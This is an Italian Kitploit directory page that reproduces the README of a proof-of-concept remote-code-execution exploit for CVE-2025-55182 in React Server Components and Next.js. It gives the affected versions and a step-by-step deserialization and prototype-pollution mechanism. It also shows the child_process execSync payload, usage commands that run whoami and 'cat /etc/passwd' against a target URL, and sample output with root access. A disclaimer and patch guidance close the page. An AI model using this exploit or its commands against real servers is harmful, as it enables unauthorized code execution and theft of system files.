Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182_PoC — Proof-of-Concept RCE per CVE‑2025‑55182 che sfrutta il protocollo React Flight su Next.js App Router. | Kitploit
Strumenti/GitHubGitHub/rl0x01/cve-2025-55182_poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Proof-of-Concept RCE per CVE‑2025‑55182 che sfrutta il protocollo React Flight su Next.js App Router.

Vedi Repository
129 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 - React Server Components RCE PoC

Autore: rl0x01

Descrizione

CVE-2025-55182 è una vulnerabilità critica (CVSS 10.0) di Remote Code Execution (RCE) che interessa React Server Components tramite il protocollo Flight.

Versioni vulnerabili

Next.jsReact
14.3.0-canary.77 a 15.0.419.0.0
15.1.1-canary.0 a 15.1.819.1.0
15.2.0-canary.0 a 15.2.519.1.1
15.3.0-canary.0 a 15.3.519.2.0
15.4.0-canary.0 a 15.4.7
15.5.1-canary.0 a 15.5.6
16.0.0-canary.0 a 16.0.6

Versioni corrette

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

Meccanismo di sfruttamento

  1. Usa $@ per ottenere un riferimento grezzo a Chunk
  2. Sovrascrive .then con Chunk.prototype.then tramite $1:__proto__:then
  3. Imposta status su resolved_model per attivare initializeModelChunk
  4. Usa $B1337 per attivare la deserializzazione di Blob
  5. Punta _formData.get al costruttore Function
  6. _prefix contiene il codice JS da eseguire

Il codice viene valutato tramite:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMANDO').toString());//1337")

Installazione

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Verifica se il target è vulnerabile

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

Esegui un comando

root@kitploit:~
# Comando predefinito (id)
python cve_2025_55182_poc.py https://target.com

# Comando personalizzato
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

Opzioni

OpzioneDescrizione
urlURL del target (obbligatorio)
-c, --commandComando da eseguire (predefinito: id)
--check-onlySolo verifica vulnerabilità
-t, --timeoutTimeout in secondi (predefinito: 15)
-v, --verboseOutput dettagliato
--rawMostra risposta grezza

Laboratorio di test vulnerabile

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server su http://localhost:3000

Esempio di output

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  Vulnerabilità di deserializzazione del React Flight Protocol     |
+======================================================================+
[*] Versione interessata: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] Punteggio CVSS: 10.0 (CRITICO)
[*] Autore: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Verifica vulnerabilità...
[+] VULNERABILE! RCE confermata - Output ricevuto

[2/2] Esecuzione comando: whoami
[+] Payload inviato!

============================================================
RISULTATO: whoami
============================================================
root
============================================================

Struttura del progetto

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Script exploit principale
├── requirements.txt          # Dipendenze Python
├── README.md                 # Documentazione
└── vulnerable-app/           # App Next.js vulnerabile per test
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

Disclaimer

⚠️ Questo strumento è fornito solo per scopi educativi e di test di sicurezza autorizzati.

L'utilizzo non autorizzato di questo strumento contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicita autorizzazione è illegale.

Mitigazione

  1. Aggiorna Next.js a 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+ o 16.0.7+
  2. Aggiorna React a una versione corretta
  3. Implementa regole WAF per bloccare payload dannosi del protocollo Flight
Scarica lo strumento